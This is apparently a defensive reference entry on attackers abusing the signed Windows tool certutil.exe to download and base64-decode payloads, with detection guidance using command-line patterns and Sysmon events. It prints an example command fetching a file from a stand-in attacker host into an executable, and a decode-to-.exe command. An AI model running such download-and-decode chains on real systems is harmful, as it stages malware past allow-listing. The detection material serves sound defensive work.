Certutil Download & Decode

Attackers abuse the signed certutil.exe to download remote payloads and to base64/hex decode staged files, proxying ingress under a trusted binary.

certutil.exe is a signed Windows command-line program for managing certificates and Certificate Services. Two of its features are routinely abused: it can download an arbitrary file from a URL (-urlcache/-verifyctl), and it can decode base64- or hex-encoded data (-decode/-decodehex). Together these turn a trusted binary into a downloader and a decoder for staged payloads.

Attackers favour certutil because it is Microsoft-signed, present on every Windows host, and often overlooked by allow-listing. Analysts encounter it during the ingress and de-staging steps of an intrusion: a script or command interpreter calls certutil to pull a payload over HTTP/S, then decodes a text-encoded blob into an executable to defeat content inspection.

How it works

The download abuse uses the URL cache feature, typically with flags to keep it quiet:

```text
certutil.exe -urlcache -split -f http://attacker.example/p.txt c:\users\public\p.exe
```

-urlcache -f forces a fresh fetch, -split writes the body to the named output file. Attackers often stage the payload as base64 text (to survive web filters) and then de-stage it locally:

```text
certutil.exe -decode c:\users\public\p.b64 c:\users\public\p.exe
```

The recognisable indicators are the -urlcache/-verifyctl flags paired with an http/https URL, and -decode/-decodehex writing an .exe/.dll output — none of which relate to certificate management, the binary's stated purpose.

Detection & analysis

Static analysis:

  • A base64-staged payload is a text file beginning with -----BEGIN CERTIFICATE----- (certutil's expected wrapper) or raw base64. Decode it and triage the resulting PE for malicious indicators.
  • Regex/YARA the command line: certutil combined with -urlcache, -verifyctl, -split, -decode, -decodehex, or -f plus a URL is high-signal. Legitimate certificate operations rarely use these in combination.

Dynamic analysis:

  • In a sandbox, watch for certutil.exe opening an outbound HTTP/S connection and writing a file into a user-writable directory — a clear downloader pattern. Capture the URL and dropped file.
  • Inspect the process tree: certutil spawned by powershell.exe, cmd.exe, wscript.exe, or an Office app is anomalous, as is a certutil run immediately followed by execution of the file it just wrote or decoded.

Detection rule hint:

Alert on Sysmon Event ID 1 where Image ends with \certutil.exe AND the command line contains -urlcache/-verifyctl/-decode/-decodehex (especially with -f and an http/https URL or an .exe/.dll output). Correlate with Event ID 3 (network connection) and Event ID 11 (file create) from the same PID to confirm download-and-stage behaviour.
